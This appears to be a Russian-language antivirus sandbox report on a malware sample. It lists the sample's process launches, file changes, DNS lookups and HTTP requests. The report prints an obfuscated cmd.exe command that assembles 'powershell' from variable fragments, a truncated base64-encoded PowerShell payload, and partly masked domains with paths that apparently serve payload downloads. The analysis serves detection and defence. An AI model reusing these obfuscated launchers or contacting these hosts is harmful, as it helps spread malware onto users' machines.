Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /v /c "set %JLEKCHXQv%=wers&&set %qEoBLBATR%=nAQPURJEd&&set %qohATFwhk%=po&&set %EfmacCKXN%=lQDdqwGRF&&set %IQIjVzHJr%=hell&&set %DHzDKipjP%=fKzhiHBkt&&!%qohATFwhk%!!%JLEKCHXQv%!!...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\27407.exe
Удаляет следующие файлы
- %TEMP%\27407.exe
Сетевая активность
Подключается к
- '07.sk':80
- 'te#####ons-coquines.fr':80
- 'ma#####folkeringa.nl':80
- 'ma#####folkeringa.nl':443
- 'a-##s.it':80
- 'a-##s.it':443
TCP
Запросы HTTP GET
- http://07.sk/H/
- http://te#####ons-coquines.fr/dIhdCsZz/
- http://ma#####folkeringa.nl/ykKWHP/
- http://a-##s.it/pJK/
Другие
- 'ma#####folkeringa.nl':443
- 'a-##s.it':443
UDP
- DNS ASK 07.sk
- DNS ASK ap####xamprep.com
- DNS ASK te#####ons-coquines.fr
- DNS ASK ma#####folkeringa.nl
- DNS ASK a-##s.it
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v /c "set %JLEKCHXQv%=wers&&set %qEoBLBATR%=nAQPURJEd&&set %qohATFwhk%=po&&set %EfmacCKXN%=lQDdqwGRF&&set %IQIjVzHJr%=hell&&set %DHzDKipjP%=fKzhiHBkt&&!%qohATFwhk%!!%JLEKCHXQv%!!...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACAAKAAgACQAcABTAEgATwBNAGUAWwA0AF0AKwAkAFAAUwBIAG8AbQBFAFsAMwAwAF0AKwAnAHgAJwApACAAKABbAFMAdAByAEkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAgACgAJwAzADYAcgAxADEAOQAsADEAMQA1AGUAOQA5AHIAMQAxAD...
